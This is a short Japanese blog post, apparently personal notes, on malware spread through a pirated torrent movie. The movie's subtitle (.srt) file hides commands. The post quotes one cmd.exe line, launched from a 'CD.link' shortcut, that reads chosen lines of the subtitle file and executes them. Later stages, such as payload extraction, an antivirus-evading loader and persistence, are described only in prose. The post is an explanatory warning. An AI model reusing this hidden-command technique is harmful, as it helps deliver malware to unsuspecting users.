torrentで配信されていたある映画に字幕ファイルが付属していた。
字幕ファイルは、一見通常の「.srt」のテキストファイルだが、一部マルウェアを実行するためのスクリプトが含まれている。
動画視聴するために、「CD.link」というショートカットを実行するとマルウェアが展開される。
特に手法としては新しいものではない。torrentで配信されていた動画でマルウェアを実行することになるってこういうことなんだぁという記録。
「CD.link」から始まるマルウェア実行
例えば、CD.linkをクリックすると以下のコマンドが実行される。
\Windows\System32\cmd.exe /c type Part2.subtitles.srt | more | findstr /n "^" | findstr "100: 101: 102: 103:" | for /f "tokens=1,* delims=:" %a in ('more') do cmd /c %b
これにより、テキスト形式の字幕ファイル(.srt)の100~103行目からコマンドを読みとって実行される。
ここで読み取ったコマンドは、.srtの別の行から別のコマンドを読み取り実行。というの繰り返す。
その後、映画自体の動画ファイル(.m2ts)に見せかけた圧縮ファイルを解凍、画像ファイル(.jpg)に含まれたデータを抽出・解凍したりしたものからマルウェアを構築。
マルウェアをアンチマルウェア製品に検知されずに実行するためのローダーも含めて準備が完了すれば、マルウェア実行。
タスクスケジューラへの登録等の永続化手法も使用されるとのこと。
所感
ところで、CD.linkで動画が再生されるって、今は一般的なのか?
確かに、DVDやBlurayをPCで読み込んで見るときは何らかのショートカットファイル(.link)をクリックして再生!みたいなことはあった気がする。
でも、今はどうなんだろ?
もしくは、「このTorrentリンクが配信されていたプラットフォームでは一般的」とか、「このショートカットから実行することで動画ファイルについている何らかのプロテクトを回避できるから、ここから実行しないといけない」というような説明書きがあったとか。
まぁ、海賊版映画を見る人たちにとっては「マルウェアに感染すること」よりも「最新の映画を観れること」の方が大事なんでしょうけどね。
別に自分は大した情報持ってないから、情報盗まれても大丈夫って思っている人達は未だに居る。その人たちは、本当にマルウェア感染したらどうなるのか、AIと一緒に一度考えてみてほしいですね。
